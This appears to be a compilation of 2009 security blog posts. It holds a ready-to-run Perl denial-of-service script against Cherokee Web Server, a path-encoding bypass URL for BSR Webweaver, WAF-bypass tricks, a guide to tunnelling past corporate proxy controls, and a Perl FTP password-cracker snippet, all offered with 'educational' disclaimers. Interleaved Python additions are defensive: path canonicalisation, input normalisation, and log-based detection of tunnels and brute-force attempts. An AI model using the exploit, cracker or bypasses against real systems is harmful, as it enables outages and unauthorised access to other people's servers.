Cherokee Web Server 0.5.4 Denial Of Service

#######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:  Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################

Disclaimer: [This code is for Educational Purposes, I would not be responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server, the server crashes!

[*] Exploitation :

#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

use IO::Socket::INET;

$host = $ARGV[0];
$PORT = $ARGV[1];

# The crafted request path from the description above.
$packet = "AUX";

$stuff = "GET /".$packet." HTTP/1.1\r\n" .
"User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n" .
"Host:127.0.0.1\r\n".
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n".
"Accept-Language: en-US,en;q=0.9\r\n".
"Accept-Charset: iso-8859-1,*,utf-8\r\n".
"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n";

# The same banner is printed for the usage message and for a normal run.
sub banner {
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";
}

# Both the host and the port are required.
if (! defined $host || ! defined $PORT)
{
banner();
exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $PORT) || die "Can't connect to $host!";
banner();

print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sending DoS Packet \n";

send ($sock, $stuff, 0);
print "[*] Crashed :) \n";
$res = recv($sock, $response, 1024, 0);
print $response;

close($sock);
exit;

BSR Webweaver 1.33 /script security Bypass vulnerability

BSR Webweaver 1.33

Author: Usman Saeed, Exploit @ Xc0re Security Research Group.

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : The ISAPI/CGI directory is [%installdirectory%/scripts], reachable over HTTP under the alias [http://[host]/scripts]. The access security check is that if the attacker tries to access /scripts, a 404 error response is returned! To bypass that check and see the directory listing [that is, if Directory Browsing is allowed in the server configuration!], just copy and paste the exploit URL.
That is why this exploit is not called a Directory Listing exploit!

[*] Exploitation :

[+] http://[host]/scripts/%bg%ae%bg%ae/.exe

Kolibri+ Webserver 2 Multiple Vulnerabilities

Kolibri+ Webserver 2 suffers from multiple vulnerabilities, namely Directory Traversal and Denial of Service. The vulnerability was reported on 6th of September 2009 by Xc0re Security Research Group.

http://xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities

An attacker can easily crash the server, or send a crafted HTTP request to escape the root directory and view any file, even outside the root directory.
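The three web-server issues above (the AUX request that crashes Cherokee on Windows, the encoded path that slips past Webweaver's /scripts check, and Kolibri+'s escape from the document root) all come from a server acting on the raw request path before it has been fully decoded and canonicalised. As an added example (my own code, not from any of these advisories or from the vendors), here is a request-path gate in Python that refuses Windows reserved device names such as AUX (opening that name on Windows reaches a device rather than a file), rejects malformed or overlong percent-encoding instead of guessing what it meant, resolves ".." without touching the filesystem, and applies the alias check only to the canonical spelling; the /scripts alias is taken from the Webweaver post and the rest of the rules are assumptions.

```python
import re

# Windows reserved device names: opening "AUX" (or "aux.txt") reaches a device, not a file.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {f"COM{i}" for i in range(1, 10)} | {f"LPT{i}" for i in range(1, 10)}
PROTECTED = ("/scripts",)   # assumption: the ISAPI/CGI alias the Webweaver post describes
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")

def strict_decode(path: str) -> str:
    """Percent-decode exactly once; reject stray '%' and bytes that are not valid UTF-8.
    Overlong encodings of '.' or '/' are invalid UTF-8, so no second spelling of '..' survives."""
    raw = bytearray()
    i = 0
    while i < len(path):
        if path[i] == "%":
            m = _PCT.match(path, i)
            if not m:
                raise ValueError("malformed percent-encoding")
            raw.append(int(m.group(1), 16))
            i += 3
        else:
            raw.extend(path[i].encode("utf-8"))
            i += 1
    return raw.decode("utf-8")   # UnicodeDecodeError (a ValueError) on invalid or overlong bytes

def check_path(request_path: str) -> str:
    """Return the canonical path, or raise ValueError naming why the request is refused."""
    decoded = strict_decode(request_path)
    if "%" in decoded or "\x00" in decoded or "\\" in decoded:
        raise ValueError("double-encoding, NUL or backslash in path")
    parts = []
    for segment in decoded.split("/"):   # resolve '.' and '..' here, before any filesystem call
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                raise ValueError("escapes the document root")
            parts.pop()
            continue
        if segment.split(".")[0].upper() in RESERVED:
            raise ValueError(f"reserved device name: {segment}")
        parts.append(segment)
    canonical = "/" + "/".join(parts)
    # Alias check runs last, on the canonical spelling, so no encoding of it slips past.
    if any(canonical == p or canonical.startswith(p + "/") for p in PROTECTED):
        raise ValueError("protected alias")
    return canonical
```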

Web Application firewall bypass !


Web application security is very important nowadays, especially because of ecommerce! Hence Web Application Firewalls came into being, which automatically filter out malicious query strings, and many high-end technology giants have them installed!

But what IF ???!!!

Someone bypasses the WAF (Web Application Firewall)? Because of the WAF, the programmers don't give much thought to filtering or properly sanitizing the input, and once it is bypassed then it's all good for the attacker!

Detecting WAF !

WAFs can easily be detected from the response one gets to an HTTP request! For instance some WAFs give off weird response codes, such as 901! Some give 40x errors even though the file exists! Some drop the packets through FIN/RST! So if the response is analysed one can easily determine whether a firewall is there or not, and which vendor it belongs to!

Bypassing WAF !

  • Encoding the input into hex or Unicode!
  • One can split the input string using & and easily bypass the WAF! (esp. the attack used against the ModSecurity WAF)
  • Even WAFs have vulnerabilities such as XSS, and thus can be easily bypassed!

To conclude, one can say that because of the premade rules of the WAFs, they become predictable and very easy to bypass!
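The encoding and parameter-splitting bypasses above both work when a rule is matched against the raw input. As an added example (my own code, not the post's and not any vendor's ruleset), the inspection step below decodes each parameter to a fixed point and checks same-named parameters both separately and joined, refusing input that is still changing after five rounds; the signature, the round limit and the join separators are assumptions.

```python
import html
import re
from urllib.parse import parse_qsl

SIGNATURE = re.compile(r"<\s*script|javascript\s*:", re.IGNORECASE)   # constructed rule, stand-in for a real ruleset
_UNI = re.compile(r"%u([0-9A-Fa-f]{4})|\\u([0-9A-Fa-f]{4})")
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")

def decode_once(value: str) -> str:
    """Strip one layer each of %uXXXX / \\uXXXX, %XX and HTML entity encoding."""
    value = _UNI.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), value)
    value = _PCT.sub(lambda m: chr(int(m.group(1), 16)), value)
    return html.unescape(value)

def normalize(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing. Input still changing after
    max_rounds is wrapped deeper than any legitimate client would, so it is refused."""
    for _ in range(max_rounds):
        decoded = decode_once(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("no fixed point after %d rounds" % max_rounds)

def inspect_query(query: str) -> list:
    """Names of parameters whose normalised value matches the rule, checked both
    alone and joined with same-named parameters (ASP joins with ', ', others concatenate)."""
    hits, grouped = [], {}
    for name, raw in parse_qsl(query, keep_blank_values=True):   # parse_qsl strips one %XX layer itself
        try:
            grouped.setdefault(name, []).append(normalize(raw))
        except ValueError:
            if name not in hits:
                hits.append(name)
    for name, values in grouped.items():
        if name in hits:
            continue
        candidates = values + [", ".join(values), "".join(values)]
        if any(SIGNATURE.search(v) for v in candidates):
            hits.append(name)
    return hits
```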

Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities

Hello! Recently I found a vulnerability in Cisco Subscriber Edge Services Manager which enables the attacker to exploit XSS and HTML Injection bugs! Details can be checked on Xc0re.
I think all the versions are affected!

Email Id leak in email servers !


Actually, as illustrated in the picture above, servers sometimes leak email IDs, which helps spammers pinpoint an email address to spam! As seen above, xt3m3@<target host.com> didn't work because it didn't exist and the server gave the message "user unknown"! Attempts are made until a legitimate email is discovered, at which point the server replies "Recipient Ok".

This is not a serious threat, but then again once emails are obtained, sending trojans, worms and viruses is normal practice! But mostly it is used for spamming!

if { web applications } then {system intrusion}

Nowadays everyone hears about ASP, PHP or ASP.NET.

These frameworks have enabled programmers to make dynamic websites. Well, web applications can be heaven for some but a disaster for others.

Let me cut directly to the chase. For instance, you encounter a website www[.]dummy[.]org which runs ASP. Dummy.org's server is guarded by a very sophisticated firewall. You find a script login.asp which has username and password fields! You somehow hack into it [for details about how to bypass core firewalls and about web application attacks visit Xc0re Knowledge Core] and see that the login interface has full control over the server and the website; you do nothing, just log out!

Now after that, who needs to hack into the box, download a rootkit and try to hack in without authentication :)!

Peace !

How tunneling softwares compromise internal security

First off let me explain what tunneling really is. Well, to make it simple I won't go into technical details but would say that, for example, you take a Lays chips packet and put something inside it that you are usually not allowed to send, seal it back up and send it through the mail. Now the mail checkpost will check that it's a Lays chips packet and forward it, and when it reaches your friend, he just unwraps it and gets the otherwise forbidden object.

Now a little technical stuff! Usually what local tunneling softwares use is HTTPS tunneling. That is, HTTPS is used as the Lays chips packet and the data you want to tunnel is inside the HTTPS-wrapped packet.

Usually the network design is such that before the gateway firewall there is a proxy server. And in the firewall policy table the proxy has more rights than a normal employee: it is allowed to access the internet with full rights and reach any remote port, whereas a normal employee has to go through the proxy to access the internet, and for him/her there are further checks at the proxy. For example:

A) Employee ----(direct external network access not allowed)----> X [Firewall] X

B) Employee -----> [Proxy] -------> [Firewall] ===> (Allowed)

In case (B) the proxy has checks on orkut.com, youtube.com etc., so the employee can't access these websites. And MSN Messenger / Yahoo Messenger are blocked by the firewall.

Now that was the scenario. Now I will tell you people how it can be bypassed easily:

You download a software, for instance Hopster. It has a live server which it connects to using HTTPS, i.e. port 443, and you can even give it the proxy IP address that you are using. Now it's so simple: it tells the proxy that it wants to connect to port 443 of the live server, the innocent proxy server forwards the request to that server through the firewall, and once connected, one can send any data out just by feeding it to Hopster!

Usually softwares like MSN Messenger, Yahoo Messenger etc. ask you to give a local proxy address; you just give your local host's IP address or 127.0.0.1 and the software's port number and you are good to go!

Solution:

The network administrator should install such softwares to check which remote servers they connect to, and block those IPs on the proxy and at the firewall end. And usually there is one server with a single live IP address, so once blocked it cannot connect.
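The tunnel described above shows up in the proxy's own log as a CONNECT to port 443 of a host nobody approved, often long-lived and carrying far more bytes than a web page. As an added example (my own code, not from the post), the script below picks those entries out of constructed log lines written in the style of Squid's native access log and collects the peer IPs to deny at the proxy and the firewall, which is the solution the post gives; the allowlist and the sample lines are assumptions.

```python
import re

ALLOWED_HOSTS = {"mail.example.com", "vpn.example.net"}   # assumption: destinations the business approved
# Constructed lines in the style of Squid's native access log:
# time elapsed_ms client action/code bytes method host:port user hierarchy/peer_ip type
LINE = re.compile(r"^\S+\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+CONNECT\s+([^:\s]+):(\d+)\s+\S+\s+\S+/(\S+)")

SAMPLE_LOG = """\
1256465000.123     600 10.0.0.5 TCP_TUNNEL/200 1048576 CONNECT tunnel.example.org:443 - HIER_DIRECT/203.0.113.7 -
1256465001.456     120 10.0.0.5 TCP_TUNNEL/200 2048 CONNECT mail.example.com:443 - HIER_DIRECT/198.51.100.2 -
1256465002.789 3600000 10.0.0.7 TCP_TUNNEL/200 73400320 CONNECT tunnel.example.org:443 - HIER_DIRECT/203.0.113.7 -
1256465003.000      30 10.0.0.7 TCP_DENIED/403 0 CONNECT other.example.org:8080 - HIER_NONE/- -
1256465004.000     200 10.0.0.5 TCP_MISS/200 5120 GET http://www.example.com/ - HIER_DIRECT/203.0.113.80 text/html
"""

def tunnels(lines):
    """Yield (client, host, port, peer_ip, bytes, elapsed_ms) for each established
    CONNECT whose destination is not on the allowlist."""
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                    # not a CONNECT request
        elapsed, client, action, size, host, port, peer = m.groups()
        if host in ALLOWED_HOSTS or not action.endswith("/200"):
            continue                    # approved destination, or the proxy already refused it
        yield client, host, int(port), peer, int(size), int(elapsed)

def tunnel_report(lines):
    """Per (client, host, port): (connections, total bytes, longest session in ms)."""
    report = {}
    for client, host, port, _, size, elapsed in tunnels(lines):
        n, b, e = report.get((client, host, port), (0, 0, 0))
        report[(client, host, port)] = (n + 1, b + size, max(e, elapsed))
    return report

def addresses_to_block(lines):
    """Peer IPs the proxy actually connected to: the list to deny at the proxy and the firewall."""
    return {t[3] for t in tunnels(lines)}
```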

Five hardcoded rules for System Security


I always watch people complaining that their data got corrupted or they had a virus attack and had to reinstall Windows! Well, that's because people are usually naive and innocent, and the guy in the picture takes advantage of that innocence.

Well, today I'll tell you five hardcoded rules that you should follow when you get Windows installed or you install it yourself.

  1. After installing Windows, install an antivirus immediately. [People usually tell me that they don't run an AV (antivirus) because it slows down their system. Well, I will give a solution for this problem near the end.]
  2. Once the AV is up and running and is updated, install a personal firewall.
  3. Once the firewall is installed, be sure to check that the Windows auto-updater is enabled.
  4. Now follow me: go to My Computer. When the window opens, go to the Tools menu -> Folder Options; when the Folder Options window opens, go to the View tab and, under the hidden files & folders option, check "show hidden files & folders", then uncheck the "hide extensions for known file types" option.
  5. Install an anti-spyware! Normally it comes in the package with an AV, but I prefer a standalone anti-spyware program.

Well, if one follows these rules and sticks to them, he/she won't need to reinstall Windows every time a virus comes.

Now, referring to the problems:

  • If the AV is heavy on your PC, install a lightweight AV. A very good example is Avast AV
  • Personal firewalls: well, one of my favourites is ZoneAlarm

Well that's all! :) Hope everyone's safe!

Writing a simple FTP cracker with Perl.

Well, PERL is a scripting language with the help of which one can make a lot of good stuff! Today I'll show you how to create a simple FTP cracker!

DISCLAIMER: Everything mentioned in this blog/post is for educational purposes. And I would not be held responsible for any illegal use of the material by anyone.

Full version of the code is here

First off we include Net::FTP:

use Net::FTP;

Now what we will do is create an FTP socket!

$ftp = Net::FTP->new($IPaddress, Timeout => 5);

where the IP address is the IP address of the target system and 5 is the timeout before trying the next connection attempt.

Now we just have to add the code to check for the username and password.

# Try the fixed username/password pair; login() returns true on success.
if ($ftp->login("ftp", "ftp")) {
    $bogus = "CRACKED Username : ftp password: ftp ";
    print "$bogus \n";
}

In the above code snippet the script checks against username = ftp and password = ftp, and if the attempt is a success it'll give the message:

CRACKED Username : ftp password: ftp !

Well, one can hard code the usernames and passwords as I have done, or get them from a file!

Peace !
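Both the email ID leak described in the earlier post and the FTP cracker above leave the same footprint on the server side: a run of rejections from one source in a short time. As an added example (my own code, not from either post), the detector below counts "User unknown" RCPT replies and 530 FTP login failures per source inside a sliding window and reports any source that exceeds the threshold; the log line format, the sample lines, the window and the threshold are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

WINDOW = timedelta(seconds=60)
THRESHOLD = 4   # more than this many rejections from one source inside WINDOW is a burst
# Constructed, daemon-neutral line format: "<date> <time> <smtp|ftp> <src ip> <RCPT|LOGIN> <target> <code> <text>"
LINE = re.compile(r"^(\S+ \S+) (smtp|ftp)\s+(\S+) (RCPT|LOGIN) (\S+) (\d{3})")
REJECT_CODES = {"smtp": {"550", "553"}, "ftp": {"530"}}   # "User unknown" / "Login incorrect"

SAMPLE_LOG = """\
2009-09-15 10:00:01 smtp 203.0.113.9 RCPT xt3m3@example.com 550 User unknown
2009-09-15 10:00:02 smtp 203.0.113.9 RCPT bob@example.com 550 User unknown
2009-09-15 10:00:03 smtp 203.0.113.9 RCPT carol@example.com 550 User unknown
2009-09-15 10:00:04 smtp 203.0.113.9 RCPT dave@example.com 250 Recipient ok
2009-09-15 10:00:05 smtp 203.0.113.9 RCPT erin@example.com 550 User unknown
2009-09-15 10:00:06 smtp 203.0.113.9 RCPT frank@example.com 550 User unknown
2009-09-15 10:05:00 ftp  198.51.100.4 LOGIN ftp 530 Login incorrect
2009-09-15 10:05:01 ftp  198.51.100.4 LOGIN admin 530 Login incorrect
2009-09-15 10:05:02 ftp  198.51.100.4 LOGIN root 530 Login incorrect
2009-09-15 10:05:03 ftp  198.51.100.4 LOGIN test 530 Login incorrect
2009-09-15 10:05:04 ftp  198.51.100.4 LOGIN guest 530 Login incorrect
2009-09-15 10:30:00 ftp  10.0.0.8 LOGIN alice 530 Login incorrect
"""

def parse(line):
    m = LINE.match(line)
    if not m:
        return None   # not one of our lines
    ts, proto, src, _, target, code = m.groups()
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), proto, src, target, code

def find_bursts(lines):
    """Map (proto, src) -> (first rejection of the burst, rejections counted when it tripped)."""
    recent = defaultdict(deque)   # sliding window of rejection timestamps per source
    alerts = {}
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, proto, src, _, code = parsed
        if code not in REJECT_CODES[proto]:
            continue   # accepted recipients and successful logins do not count
        q = recent[(proto, src)]
        q.append(ts)
        while ts - q[0] > WINDOW:
            q.popleft()   # drop rejections older than the window
        if len(q) > THRESHOLD and (proto, src) not in alerts:
            alerts[(proto, src)] = (q[0], len(q))
    return alerts
```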
